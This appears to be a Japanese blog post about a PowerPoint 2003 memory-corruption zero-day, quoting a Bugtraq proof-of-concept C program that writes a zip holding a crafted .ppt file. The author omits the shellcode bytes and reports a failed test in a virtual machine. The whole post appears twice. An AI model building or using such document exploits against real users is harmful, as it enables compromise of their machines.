先日、bagtraq に下記のような C のソースが投稿されてました。
少し前に、ワード、エクセルでセキュリティーホールが見つかって
パッチがリリースされてましたが、パワーポイントも脆弱性がある
のでしょうか?
英語が苦手な小生は、かなりの「ナナメ読み」しかできないため
よく判らない(^^;)のですが、FAQをまとめたサイトに比較的判り
易く(?)かいてあるようです。
● Microsoft PowerPoint 0-day Vulnerability FAQ [UPDATED]
http://blogs.securiteam.com/?p=508
尚、MSのセキュリティアドバイザリ(下記)には、このことは触れられて
いないようです。
● Microsoft Security Advisories
http://www.microsoft.com/technet/security/advisory/default.mspx
ちなみに、投稿されたCソースをコンパイルすると、unzip_powPOC.zip
というファイルができます。これを解凍すると 、mme.ppt というパワーポイントの
文書ができます。これを「開いてから閉じると何かが起こる」らしいのですが、
小生の環境 Linux + vmware + win2k + PowerPoint Viewer では何も起き
ませんでした。。。(ソースには PowerPoint 2003 でテストした、って書いて
あるから、Viewer じゃダメなのかも。。。)
実験してみた方はコメントください。。
※Bagtraq に投稿されてた検証用コード(?)
/*-----------------------------------------------------------------------------------------
* MS Power Point mem. corruption POC
* try to close this file .....
* modifying some personal bytes :P :P :P
* thanks to "psycho"
* Tested against Power Point ' 03
* -- naveed afzal
*---------------------------------------------------------------------------------------*/
#include <stdio.h>
unsigned char ps[] = {
0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x00, 0x00, 0x08, 0x00, 0x9A,
…………………………………………………………………………………
途中、シェルコードのようなものが書いてあるため省略
…………………………………………………………………………………
0x00, 0x00, 0x08, 0x2E, 0x00,
0x00, 0x00, 0x00
};
FILE* f;
char *fname="unzip_powPOC.zip";
int main()
{
f=fopen(fname,"wb+");
fwrite(&ps[0],1,11859,f);
fclose(f);
printf("Extract the archive and open PowerPoint file.!nnThen just
close it!!nn");
return 0;
}
少し前に、ワード、エクセルでセキュリティーホールが見つかって
パッチがリリースされてましたが、パワーポイントも脆弱性がある
のでしょうか?
英語が苦手な小生は、かなりの「ナナメ読み」しかできないため
よく判らない(^^;)のですが、FAQをまとめたサイトに比較的判り
易く(?)かいてあるようです。
● Microsoft PowerPoint 0-day Vulnerability FAQ [UPDATED]
http://blogs.securiteam.com/?p=508
尚、MSのセキュリティアドバイザリ(下記)には、このことは触れられて
いないようです。
● Microsoft Security Advisories
http://www.microsoft.com/technet/security/advisory/default.mspx
ちなみに、投稿されたCソースをコンパイルすると、unzip_powPOC.zip
というファイルができます。これを解凍すると 、mme.ppt というパワーポイントの
文書ができます。これを「開いてから閉じると何かが起こる」らしいのですが、
小生の環境 Linux + vmware + win2k + PowerPoint Viewer では何も起き
ませんでした。。。(ソースには PowerPoint 2003 でテストした、って書いて
あるから、Viewer じゃダメなのかも。。。)
実験してみた方はコメントください。。
※Bagtraq に投稿されてた検証用コード(?)
/*-----------------------------------------------------------------------------------------
* MS Power Point mem. corruption POC
* try to close this file .....
* modifying some personal bytes :P :P :P
* thanks to "psycho"
* Tested against Power Point ' 03
* -- naveed afzal
*---------------------------------------------------------------------------------------*/
#include <stdio.h>
unsigned char ps[] = {
0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x00, 0x00, 0x08, 0x00, 0x9A,
…………………………………………………………………………………
途中、シェルコードのようなものが書いてあるため省略
…………………………………………………………………………………
0x00, 0x00, 0x08, 0x2E, 0x00,
0x00, 0x00, 0x00
};
FILE* f;
char *fname="unzip_powPOC.zip";
int main()
{
f=fopen(fname,"wb+");
fwrite(&ps[0],1,11859,f);
fclose(f);
printf("Extract the archive and open PowerPoint file.!nnThen just
close it!!nn");
return 0;
}
